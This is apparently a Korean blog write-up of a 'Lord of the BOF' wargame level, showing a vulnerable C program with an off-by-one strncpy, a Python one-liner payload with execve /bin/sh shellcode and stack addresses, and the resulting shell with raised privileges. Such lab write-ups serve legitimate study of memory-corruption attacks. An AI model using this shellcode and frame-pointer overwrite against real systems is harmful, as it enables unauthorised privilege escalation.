ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • [lob] golem -> darknight
    공부/LOB 2014. 7. 30. 20:06

    [golem@localhost golem]$ cat darkknight.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - darkknight
            - FPO
    */

    #include <stdio.h>
    #include <stdlib.h>

    void problem_child(char *src)
    {
        char buffer[40];
        strncpy(buffer, src, 41);
        printf("%s\n", buffer);
    }

    main(int argc, char *argv[])
    {
        if(argc<2){
            printf("argv error\n");
            exit(0);
        }

        problem_child(argv[1]);
    }
    [golem@localhost golem]$

    `python -c'print"\xb8\xfa\xff\xbf"+"\xbc\xfa\xff\xbf"+"\x90"*7+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xb4"'`

    [golem@localhost golem]$ ./darkknight `python -c'print"\xb8\xfa\xff\xbf"+"\xbc\xfa\xff\xbf"+"\x90"*7+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\xb4"'`
    뫄옘?퓧??????1픐h//shh/bin??S??째
                                         ?덜퓹?4.?옹    @
    bash$ my-pass
    euid = 512
    new attacker
    bash$

    payload = dummy 4byte + shellcode address 4byte + nop 7byte + shellcode 23byte + dummy 1byte

    '공부 > LOB' 카테고리의 다른 글

    [lob] bugbear -> giant  (0) 2014.07.30
    [lob] darkknight -> bugbrear  (0) 2014.07.30
    [lob] golem -> darknight  (0) 2014.07.30
    [lob] vampire -> skeleton  (3) 2014.07.30
    [lob] troll -> vampire  (0) 2014.07.30
    [lob] orge -> troll  (0) 2014.07.30

    댓글 0

Designed by Tistory.